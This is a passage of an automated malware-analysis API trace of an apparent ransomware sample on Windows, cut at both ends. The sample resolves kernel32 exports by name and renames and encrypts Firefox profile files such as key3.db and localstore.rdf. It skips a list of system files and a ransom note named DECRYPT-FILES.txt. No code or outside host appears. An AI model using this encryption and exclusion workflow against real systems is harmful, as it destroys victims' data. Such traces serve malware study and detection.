returned 21 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.420] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.420] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.420] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.420] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.420] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.420] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.420] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.420] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.420] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.420] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.420] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.420] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.420] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.421] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.421] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.421] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 95 [0081.421] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.XJe4Dr") returned 102 [0081.421] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.XJe4Dr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.xje4dr"), dwFlags=0x0) returned 1 [0081.421] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.422] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.422] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.422] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x850d63f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x850d63f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x850d63f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x501, dwReserved0=0x0, dwReserved1=0x0, cFileName="localstore.rdf", cAlternateFileName="LOCALS~1.RDF")) returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="DECRYPT-FILES.txt") returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="autorun.inf") returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="boot.ini") returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="desktop.ini") returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="ntuser.dat") returned -1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="iconcache.db") returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="bootsect.bak") returned 1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="ntuser.dat.log") returned -1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="thumbs.db") returned -1 [0081.422] lstrcmpiW (lpString1="localstore.rdf", lpString2="Bootfont.bin") returned 1 [0081.422] lstrlenW (lpString="localstore.rdf") returned 14 [0081.423] lstrcmpiW (lpString1="rdf", lpString2="lnk") returned 1 [0081.423] lstrcmpiW (lpString1="rdf", lpString2="exe") returned 1 [0081.423] lstrcmpiW (lpString1="rdf", lpString2="sys") returned -1 [0081.423] lstrcmpiW (lpString1="rdf", lpString2="dll") returned 1 [0081.423] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.423] lstrlenW (lpString="localstore.rdf") returned 14 [0081.423] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.423] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="localstore.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" [0081.423] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.424] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=1281) returned 1 [0081.424] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.424] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.428] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.428] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.428] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.429] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.429] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.429] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.429] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.430] CloseHandle (hObject=0x464) returned 1 [0081.430] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.430] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.431] CloseHandle (hObject=0x0) returned 0 [0081.431] CloseHandle (hObject=0x460) returned 1 [0081.431] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.431] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.431] GetTickCount () returned 0x114cd6d [0081.431] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.432] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.432] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.432] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.432] lstrlenA (lpString="kernel32.dll") returned 12 [0081.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.432] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.432] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.432] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.433] lstrlenA (lpString="ADDATOMA") returned 8 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.433] lstrlenA (lpString="ADDATOMW") returned 8 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.433] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.433] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.433] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.433] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.433] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.433] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.433] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.433] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.433] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.433] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.433] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.433] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.433] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.433] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.433] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.433] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.434] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.434] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.434] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.434] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.434] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.434] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.434] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.434] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.434] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.434] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.434] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.434] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.434] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.434] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.434] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.434] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.434] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.434] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.435] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.435] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.435] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.435] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.435] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.435] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.435] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.435] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.435] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.435] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.435] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.435] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.435] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.435] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.435] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.435] lstrlenA (lpString="BEEP") returned 4 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.435] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.435] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.436] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.436] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.436] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.436] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.436] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.436] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.436] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.436] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.436] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.436] lstrlenA (lpString="CANCELIO") returned 8 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.436] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.436] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.436] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.436] lstrcpyA (in: 